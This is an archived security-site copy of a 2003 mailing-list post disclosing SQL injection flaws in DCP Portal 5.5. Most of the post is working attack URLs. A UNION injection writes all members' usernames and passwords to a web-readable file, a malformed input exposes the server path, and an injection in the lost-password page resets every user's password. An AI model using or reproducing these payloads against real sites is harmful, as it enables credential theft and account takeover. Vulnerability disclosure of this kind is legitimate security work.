what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dcpportal.txt

dcpportal.txt
Posted Oct 1, 2003
Authored by Lifo Fifo | Site hackingzone.org

DCP Portal 5.5 is susceptible to multitudes of SQL injection attacks.

tags | exploit, sql injection
SHA-256 | 4f047b815f0a078df914af5f2b80023f7c43c58e79712d72f8210ace0cbbed7c
Download | Favorite | View

dcpportal.txt

Change Mirror Download
From: Lifo Fifo <lifofifo20@yahoo.com>
To: bugtraq@securityfocus.com
Subject: DCP Portal - 5.5 holes



Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned off register_globals.

All the files in the product, dont check for integrity of variables. You can easily exploit this using some SQL Injection techniques. For example, if you want to get username/password of all the users, you can exploit advertiser.php. 

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In this cases, you will need to enter the absolute path. For that, run the follwing

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the path to the sever if they have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This will really cause some damage. It will reset password of everyone. Everyone will get as many mails as the number of users. And evryone's password will be the one provided in the last email.

I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch select-fish attacks, which would work even in case of magic_quotes_gpc is on.

Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in making DCP Portal.

-lifofifo
http://www.hackingzone.org/

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close